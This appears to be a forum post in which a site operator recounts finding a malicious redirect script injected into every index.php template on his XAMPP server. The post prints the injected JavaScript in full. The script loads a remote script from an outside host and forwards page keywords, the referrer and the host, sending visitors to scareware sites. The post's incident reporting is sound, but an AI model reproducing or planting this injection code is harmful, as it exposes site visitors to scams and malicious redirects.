The XAMPP server has been working great for more than 10 years. It's on a Windows 7 computer with RAID1 Solid States Drives and I'm only running Apache and MySQL but not as service. For email I'm not using Mercury which came with it but hMailServer.
The server was connected directly to the modem for a decade until a couple of years ago my ISP warned me it had been used for spam. After closing all holes I moved the server behind a SonicWall TZ200, party is over. This redirect infection must've been there for very long time as I sincerely doubt any yoyo can get passed a SonicWall.
At first I thought it was the Apache Server that had been compromised but when my head cooled off it came down to two options: ".htaccess" or "index.php"
The second was right, every single template in every single website on the server had the script below inserted <head> between </head> portion of the "index.php". That scrypt would bring up the URL
http://redirect.xmlheads.com/index.php on the webbrowser which in turn would redirect to poorly and crapy designed websites some of of which would scare you saying your computer was infected and to call certain number in USA... well not anymore.
------------
<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://ds-expertin.de/js/jquery.min.php?c_utt=G91825&c_utm='+encodeURIComponent('http://ds-expertin.de/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>
------------